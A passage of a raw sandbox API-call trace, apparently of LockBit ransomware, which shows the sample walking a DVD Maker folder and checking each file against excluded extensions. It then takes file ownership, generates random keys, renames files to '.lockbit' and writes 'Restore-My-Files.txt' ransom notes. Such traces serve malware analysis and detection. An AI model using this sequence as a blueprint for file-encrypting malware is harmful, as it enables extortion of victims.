TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.182] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.182] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.182] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.183] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.183] CloseHandle (hObject=0x3c0) returned 1 [0084.183] free (_Block=0x77d800) [0084.183] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-over-select.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0084.184] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.184] malloc (_Size=0x40068) returned 0x1ff1e60 [0084.185] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3016) returned 1 [0084.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0084.186] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0084.186] ReadFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0084.197] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.197] malloc (_Size=0xcc) returned 0x77d800 [0084.197] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xcc, FileInformationClass=0xa) returned 0x0 [0084.198] free (_Block=0x77d800) [0084.198] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-over-select.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.198] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.198] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.198] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x724a0a00, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x724a0a00, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6b6717, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_btn-previous-static.png", cAlternateFileName="")) returned 1 [0084.198] lstrcmpiW (lpString1=".", lpString2="Pets_btn-previous-static.png") returned -1 [0084.198] lstrcmpiW (lpString1="..", lpString2="Pets_btn-previous-static.png") returned -1 [0084.198] PathFindExtensionW (pszPath="Pets_btn-previous-static.png") returned=".png" [0084.198] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.198] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.198] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.198] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.199] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.199] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.200] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.200] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.200] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.200] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.200] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.200] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.200] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.200] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.200] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.201] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.201] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.201] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.201] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.201] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.201] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.201] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.201] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.201] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_btn-previous-static.png") returned 1 [0084.201] lstrcmpiW (lpString1="ntldr", lpString2="Pets_btn-previous-static.png") returned -1 [0084.201] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_btn-previous-static.png") returned -1 [0084.201] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_btn-previous-static.png") returned -1 [0084.201] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_btn-previous-static.png") returned -1 [0084.201] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_btn-previous-static.png") returned 1 [0084.201] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_btn-previous-static.png") returned -1 [0084.201] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.201] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png") returned=".png" [0084.201] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.201] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.201] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.201] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.201] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.202] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.202] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.202] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.202] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.202] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.203] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.203] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.203] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.203] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png.lockbit") returned 86 [0084.203] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.204] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.204] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.204] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.204] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.205] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.205] RtlFreeAnsiString (AnsiString="\\") [0084.205] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0084.205] malloc (_Size=0x200) returned 0x77d800 [0084.205] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.205] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.205] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.205] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.206] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.206] CloseHandle (hObject=0x3b8) returned 1 [0084.206] free (_Block=0x77d800) [0084.206] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-previous-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0084.206] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.206] malloc (_Size=0x40068) returned 0x1fb18c0 [0084.206] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=2019) returned 1 [0084.207] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.207] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.207] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0084.207] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.208] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.208] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0084.208] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.217] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0084.217] malloc (_Size=0xc2) returned 0x77d800 [0084.217] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0084.218] free (_Block=0x77d800) [0084.218] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-previous-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0084.218] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0084.218] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.218] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x722d79a4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x722d79a4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6b6717, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x33b7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_frame-border.png", cAlternateFileName="")) returned 1 [0084.219] lstrcmpiW (lpString1=".", lpString2="Pets_frame-border.png") returned -1 [0084.219] lstrcmpiW (lpString1="..", lpString2="Pets_frame-border.png") returned -1 [0084.219] PathFindExtensionW (pszPath="Pets_frame-border.png") returned=".png" [0084.219] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0084.219] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0084.219] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0084.220] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0084.220] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0084.220] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0084.220] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0084.220] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0084.220] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0084.220] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0084.220] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0084.220] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0084.221] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0084.221] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0084.221] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0084.221] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0084.221] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0084.221] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0084.221] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0084.221] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_frame-border.png") returned 1 [0084.221] lstrcmpiW (lpString1="ntldr", lpString2="Pets_frame-border.png") returned -1 [0084.221] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_frame-border.png") returned -1 [0084.221] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_frame-border.png") returned -1 [0084.221] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_frame-border.png") returned -1 [0084.221] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_frame-border.png") returned 1 [0084.221] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_frame-border.png") returned -1 [0084.221] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0084.221] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png") returned=".png" [0084.221] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0084.221] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0084.221] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0084.221] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0084.221] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0084.221] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0084.222] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0084.222] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0084.222] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0084.222] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0084.222] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0084.222] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0084.222] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0084.222] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0084.223] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png.lockbit") returned 79 [0084.223] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-border.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0084.223] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0084.223] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0084.223] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0084.224] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0084.224] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0084.224] RtlFreeAnsiString (AnsiString="\\") [0084.224] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0084.224] malloc (_Size=0x200) returned 0x77d800 [0084.224] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0084.224] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.224] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0084.224] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.225] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0084.225] CloseHandle (hObject=0x3bc) returned 1 [0084.225] free (_Block=0x77d800) [0084.225] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_frame-border.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_frame-border.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0084.226] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0084.226] malloc (_Size=0x40068) returned 0x3df0008 [0084.226] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13239) 